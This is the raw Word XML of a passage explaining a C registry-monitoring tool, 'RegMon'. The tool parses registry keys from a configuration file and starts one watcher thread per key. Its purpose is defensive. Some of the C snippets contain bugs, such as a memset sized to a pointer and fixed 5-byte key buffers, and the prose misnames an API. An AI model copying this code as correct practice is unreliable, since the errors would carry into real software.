      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_KEY_LEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 1);</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B0640C" w:rsidRDefault="00B0640C" w:rsidP="00B0640C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="0" w:firstLine="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strncpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> *) lpKey, lpKeyStart, (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>size_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)(lpKeyEnd - lpKeyStart));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRPr="00B0640C" w:rsidRDefault="002565A7" w:rsidP="00B0640C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00211D26" w:rsidRDefault="00F77C71" w:rsidP="009B04F7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>For example, a registry key read from the configuration file may be: &lt;Key&gt;HKLM\\Software\\Microsoft\\Windows\\CurrentControlSet\\Run&lt;/Key&gt;. RegMon reads between two tags (&lt;Key&gt; and &lt;/Key&gt;), then the is for being monitored is HKLM\\Software\\Microsoft\\Windows\\CurrentControlSet\\Run.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B6E8A" w:rsidRDefault="00F77C71" w:rsidP="009B04F7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Now, RegMon separates the key into 2 main part, one is a main key (Root key) which is the four letter</w:t>
      </w:r>
      <w:r w:rsidR="00211D26">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at the beginning of the key, and the second part is the subkey which is the rest of the key.</w:t>
      </w:r>
      <w:r w:rsidR="00B0640C">
        <w:t xml:space="preserve"> From the above example, the main key (or root key) is “HKLM” and the subkey is the rest of the key, which is “Software\\Microsoft\\Windows \\CurrentControlSet\\Run”</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Allocating memory for storing the main key</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pRegKey[iThread]-&gt;stlpMainKey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calloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>5,1);</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//Registry main key (Root key)</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lpMainKey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calloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>5,1);</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lpTmp = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>strstr( lpKey</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"\\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</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strncpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>lpMainKey, lpKey, (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>size_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)(lpTmp - lpKey));</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//Registry Subkey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F77C71" w:rsidRDefault="00F77C71" w:rsidP="00F77C71">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">lpKey = lpTmp + </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sizeof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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00211D26" w:rsidRDefault="00211D26" w:rsidP="009B04F7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>RegMon creates a separated thread for each key being monitored. Each thread calls the function “RegMonitor” and passes to that function the main key and the subkey stored in a struct called REGKEY</w:t>
      </w:r>
      <w:r w:rsidR="009A2690">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//Registry Monitor Threads</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strcpy(pRegKey[iThread]-&gt;stlpMainKey, lpMainKey);</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strcpy(pRegKey[iThread]-&gt;stlpKey, lpKey);</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hThreadArray[iThread] = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CreateThread(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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0,</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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPTHREAD_START_ROUTINE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) RegMonitor,</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pRegKey[iThread],</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0,</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&amp;dwThreadIdArray[iThread]</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(hThreadArray[iThread] == </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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//ErrorHander(TEXT("CreateThread"));</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ExitProcess(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1);</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memset(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">lpKey, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(lpKey));</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memset(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">lpMainKey, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(lpMainKey));</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iThread++;</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Sleep(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>10);</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
    <w:p w:rsidR="006B6E8A" w:rsidRDefault="00211D26" w:rsidP="009B04F7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>REGKEY is a struct created for storing a registry key as 2 main part.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00211D26" w:rsidRDefault="00211D26" w:rsidP="00211D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typedef</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>RegKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00211D26" w:rsidRDefault="00211D26" w:rsidP="00211D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stlpMainKey;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00211D26" w:rsidRDefault="00211D26" w:rsidP="00211D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stlpKey;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00211D26" w:rsidRDefault="00211D26" w:rsidP="00211D26">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>REGKEY</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PREGKEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A4D8F" w:rsidRDefault="009A2690" w:rsidP="009B04F7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>RegMon then calls a function named WaitForSMultipleObject to wait for all these threads executing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A2690" w:rsidRDefault="009A2690" w:rsidP="009A2690">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>WaitForMultipleObjects(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">iThread, hThreadArray, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>INFINITE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D4BC6" w:rsidRDefault="007D4BC6" w:rsidP="009A2690">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D4BC6" w:rsidRPr="007D4BC6" w:rsidRDefault="007D4BC6" w:rsidP="009A2690">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D4BC6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>RegMonitor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A2690" w:rsidRDefault="007D4BC6" w:rsidP="009A2690">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>RegMonitor is the function called by the created threads from RegMon. RegMonitor receives the main key and subkey information stored in a struct object, then parse these information into 2 strings storing the main key and subkey information.</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int</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RegMonitor(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPVOID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>lpRegKey</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PREGKEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> pRegKey;</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pRegKey = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PREGKEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>lpRegKey</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achMainKey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calloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>5,1);</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achSubKey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calloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_KEY_LEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 1);</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snprintf(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">achMainKey, 5, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"%s"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, pRegKey-&gt;stlpMainKey);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D4BC6" w:rsidRDefault="007D4BC6" w:rsidP="007D4BC6">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>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snprintf(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">achSubKey, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_KEY_LEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"%s"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, pRegKey-&gt;stlpKey);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A2690" w:rsidRDefault="00B0640C" w:rsidP="009B04F7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
